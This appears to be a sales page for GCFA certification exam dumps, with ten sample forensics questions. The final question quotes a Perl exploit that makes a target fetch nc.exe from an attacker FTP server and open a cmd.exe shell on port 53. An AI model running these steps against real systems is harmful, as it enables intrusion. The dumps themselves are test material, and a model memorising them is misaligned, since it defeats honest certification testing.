| Exam Code | GCFA |
| Exam Name | GIACCertified Forensics Analyst |
| Questions | 318 |
| Update Date | July 16,2026 |
| Price |
Was : |
GIAC GCFA exam certification is the best way to demonstrate your understanding, capability and talent. DumpsforSure is here to provide you with best knowledge on GCFA certification. By using our GCFA questions & answers you can not only secure your current position but also expedite your growth process.
We are devoted and dedicated to providing you with real and updated GCFA exam dumps, along with explanations. Keeping in view the value of your money and time, all the questions and answers on Dumpsforsure has been verified by GIAC experts. They are highly qualified individuals having many years of professional experience.
Dumpsforsure is a central tool to help you prepare your GIAC GCFA exam. We have collected real exam questions & answers which are updated and reviewed by professional experts regularly. In order to assist you understanding the logic and pass the GIAC exams, our experts added explanation to the questions.
Dumpsforsure is committed to update the exam databases on regular basis to add the latest questions & answers. For your convenience we have added the date on the exam page showing the most latest update. Getting latest exam questions you'll be able to pass your GIAC GCFA exam in first attempt easily.
Dumpsforsure is offering free Demo facility for our valued customers. You can view Dumpsforsure's content by downloading GCFA free Demo before buying. It'll help you getting the pattern of the exam and form of GCFA dumps questions and answers.
Our professional expert's team is constantly checking for the updates. You are eligible to get 90 days free updates after purchasing GCFA exam. If there will be any update found our team will notify you at earliest and provide you with the latest PDF file.
John works as a Technical Support Executive in ABC Inc. The company's network consists of ten computers with Windows XP professional installed on all of them. John is working with a computer on which he has enabled hibernation. He shuts down his computer using hibernation mode. Which of the following will happen to the data after powering off the system using hibernation?
A. Data will be saved automatically before the system is switched off.
B. Data will be stored on the ROM.
C. Data will be saved before the system is switched off if you have configured hibernation to save data.
D. Unsaved data will be lost when hibernation switches off the system.
Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using Alternate Data Streams (ADS) feature. Which of the following statements is true in context with the above scenario?
A. Alternate Data Streams is a feature of Linux operating system.
B. Adam is using FAT file system.
C. Adam is using NTFS file system.
D. Adam's system runs on Microsoft Windows 98 operating system.
A customer comes to you stating that his hard drive has crashed. He had backed up the hard drive, but some files on it were encrypted with Windows Encrypted File System (EFS). What do you need to do to be able to give him access to those restored encrypted files?
A. Nothing, they are unrecoverable.
B. You need the encryption key. If that was not saved/backed up, then there is no chance of recovery.
C. Nothing, when you restore, he will have access.
D. You need to make sure that when you restore, you give the new machine the same user account so that he can open the encrypted files.
Which of the following is used to back up forensic evidences or data folders from the network or locally attached hard disk drives?
A. WinHex
B. Device Seizure
C. FAR system
D. Vedit
Based on the case study, to implement more security, which of the following additional technologies should you implement for laptop computers? (Click the Exhibit button on the toolbar to see the case study.) Each correct answer represents a complete solution. Choose two.
A. PAP authentication
B. Encrypting File System (EFS)
C. Digital certificates
D. Two-factor authentication
E. Encrypted Data Transmissions
John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. John is working as a root user on the Linux operating system. He wants to forward all the kernel messages to the remote host having IP address 192.168.0.1. Which of the following changes will he perform in the syslog.conf file to accomplish the task?
A. kern.* @192.168.0.1
B. !*.* @192.168.0.1
C. *.* @192.168.0.1
D. !kern.* @192.168.0.1
Which of the following types of attacks cannot be prevented by technical measures only?
A. Ping flood attack
B. Brute force
C. Smurf DoS
D. Social engineering
Which of the following tools works by using standard set of MS-DOS commands and can create an MD5 hash of an entire drive, partition, or selected files?
A. DriveSpy
B. Ontrack
C. Forensic Sorter
D. Device Seizure
Which of the following files contains the salted passwords in the Linux operating system?
A. |bin|passwd
B. |etc|passwd
C. |bin|shadow
D. |etc|shadow
Adam, a malicious hacker performs an exploit, which is given below: ################################################################# $port = 53; # Spawn cmd.exe on port X $your = "192.168.1.1";# Your FTP Server 89 $user = "Anonymous";# login as $pass = '[email protected]';# password ################################################################# $host = $ARGV[0]; print "Starting ...|n"; print "Server will download the file nc.exe from $your FTP server.|n"; system("perl msadc.pl -h $host -C |"echo open $your >sasfile|""); system("perl msadc.pl -h $host -C |"echo $user>>sasfile|""); system("perl msadc.pl -h $host -C |"echo $pass>>sasfile|""); system("perl msadc.pl -h $host -C |"echo bin>>sasfile|""); system("perl msadc.pl -h $host -C |"echo get nc.exe>>sasfile|""); system("perl msadc.pl -h $host -C |"echo get hacked. html>>sasfile|""); system("perl msadc.pl -h $host -C |"echo quit>>sasfile|""); print "Server is downloading ... |n"; system("perl msadc.pl -h $host -C |"ftp |-s|:sasfile|""); print "Press ENTER when download is finished ... (Have a ftp server)|n"; $o=; print "Opening ...|n"; system("perl msadc.pl -h $host -C |"nc -l -p $port -e cmd.exe|""); print "Done.|n"; #system("telnet $host $port"); exit(0); Which of the following is the expected result of the above exploit?
A. Creates an FTP server with write permissions enabled
B. Opens up a telnet listener that requires no username or password
C. Opens up a SMTP server that requires no username or password
D. Creates a share called "sasfile" on the target system